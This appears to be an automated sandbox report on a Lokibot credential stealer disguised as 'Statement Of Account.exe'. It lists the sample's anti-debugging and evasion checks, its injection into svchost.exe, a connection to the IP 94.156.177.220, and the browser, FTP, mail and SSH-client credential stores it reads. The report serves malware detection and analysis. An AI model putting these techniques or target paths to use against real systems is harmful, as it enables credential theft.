Source: C:\Users\user\Desktop\Statement Of Account.exe API/Special instruction interceptor: Address: 3D5BE4C
Source: C:\Users\user\Desktop\Statement Of Account.exe API/Special instruction interceptor: Address: 3C7E22C
Source: C:\Users\user\Desktop\Statement Of Account.exe API/Special instruction interceptor: Address: 3E2BE5C
Source: C:\Users\user\Desktop\Statement Of Account.exe API/Special instruction interceptor: Address: 3D7C224
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Statement Of Account.exe API coverage: 3.3 %
Source: C:\Users\user\Desktop\Statement Of Account.exe API coverage: 3.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\svchost.exe TID: 1476 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 3_2_00452126
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 3_2_0045C999
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 3_2_00436ADE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_00434BEE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0045DD7C FindFirstFileW,FindClose, 3_2_0045DD7C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 3_2_0044BD29
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 3_2_00436D2D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_00442E1F
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_00475FE5
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_0044BF8D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 10_2_00403D74
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 60000 Jump to behavior
Source: Statement Of Account.exe, 00000005.00000002.2103795150.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\c
Source: Statement Of Account.exe, 00000000.00000002.2061145880.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c18-806e6f6e6963}#0000000007500000#{f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
Source: svchost.exe, 0000000A.00000002.3296137743.0000000002E00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0045A259 BlockInput, 0_2_0045A259
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_03E4F128 mov eax, dword ptr fs:[00000030h] 0_2_03E4F128
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_03E4F0C8 mov eax, dword ptr fs:[00000030h] 0_2_03E4F0C8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_03E4DAA8 mov eax, dword ptr fs:[00000030h] 0_2_03E4DAA8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_03D5C118 mov eax, dword ptr fs:[00000030h] 3_2_03D5C118
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_03D5C0B8 mov eax, dword ptr fs:[00000030h] 3_2_03D5C0B8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_03D5AA98 mov eax, dword ptr fs:[00000030h] 3_2_03D5AA98
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 5_2_03C7E4F8 mov eax, dword ptr fs:[00000030h] 5_2_03C7E4F8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 5_2_03C7CE78 mov eax, dword ptr fs:[00000030h] 5_2_03C7CE78
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 5_2_03C7E498 mov eax, dword ptr fs:[00000030h] 5_2_03C7E498
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 7_2_03E2C0C8 mov eax, dword ptr fs:[00000030h] 7_2_03E2C0C8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 7_2_03E2C128 mov eax, dword ptr fs:[00000030h] 7_2_03E2C128
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 7_2_03E2AAA8 mov eax, dword ptr fs:[00000030h] 7_2_03E2AAA8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 9_2_03D7C4F0 mov eax, dword ptr fs:[00000030h] 9_2_03D7C4F0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 9_2_03D7AE70 mov eax, dword ptr fs:[00000030h] 9_2_03D7AE70
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 9_2_03D7C490 mov eax, dword ptr fs:[00000030h] 9_2_03D7C490
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h] 10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h] 10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h] 10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00124610 mov eax, dword ptr fs:[00000030h] 10_2_00124610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00124410 mov eax, dword ptr fs:[00000030h] 10_2_00124410
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00124410 mov eax, dword ptr fs:[00000030h] 10_2_00124410
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_001256A0 mov eax, dword ptr fs:[00000030h] 10_2_001256A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_001256A0 mov ecx, dword ptr fs:[00000030h] 10_2_001256A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123540 mov eax, dword ptr fs:[00000030h] 10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123540 mov eax, dword ptr fs:[00000030h] 10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123540 mov eax, dword ptr fs:[00000030h] 10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h] 10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h] 10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h] 10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123060 mov eax, dword ptr fs:[00000030h] 10_2_00123060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0040317B mov eax, dword ptr fs:[00000030h] 10_2_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_00426DA1
Enables debug privileges
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter, 0_2_0042202E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004230F5
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417D93
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00421FA7
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0042202E SetUnhandledExceptionFilter, 3_2_0042202E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004230F5
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00417D93
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00421FA7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_001233C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode, 10_2_001233C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00125848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00125848

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 94.156.177.220 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Statement Of Account.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2908008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0043916A LogonUserW, 0_2_0043916A
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_00436431
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Statement Of Account.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00445DD3
Source: Statement Of Account.exe Binary or memory string: Shell_TrayWnd
Source: Statement Of Account.exe, 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmp, Statement Of Account.exe, 00000003.00000002.2077722636.0000000000482000.00000040.00000001.01000000.00000003.sdmp, Statement Of Account.exe, 00000005.00000002.2103328212.0000000000482000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00410D10 cpuid 0_2_00410D10
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004223BC
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004711D2 GetUserNameW, 0_2_004711D2
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Lokibot
Source: Yara match File source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6976, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 1124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Statement Of Account.exe PID: 6416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000A.00000002.3296173154.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\SysWOW64\svchost.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\SysWOW64\svchost.exe Code function: PopPassword 10_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe Code function: SmtpPassword 10_2_0040D069
OS version to string mapping found (often used in BOTs)
Source: Statement Of Account.exe, 00000009.00000002.2139551360.0000000000482000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: Statement Of Account.exe Binary or memory string: WIN_XP
Source: Statement Of Account.exe Binary or memory string: WIN_XPe
Source: Statement Of Account.exe Binary or memory string: WIN_VISTA
Source: Statement Of Account.exe Binary or memory string: WIN_7
Yara detected Credential Stealer
Source: Yara match File source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Statement Of Account.exe.2fb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Statement Of Account.exe.a80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2061105444.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2140094185.0000000002EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3295786931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2121457716.0000000000A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2103948466.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2078717207.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_004741BB
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 0_2_0046483C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0047AD92
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 3_2_004741BB
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 3_2_0046483C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 3_2_0047AD92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00126BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status, 10_2_00126BB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00126AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status, 10_2_00126AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00126B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status, 10_2_00126B60
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
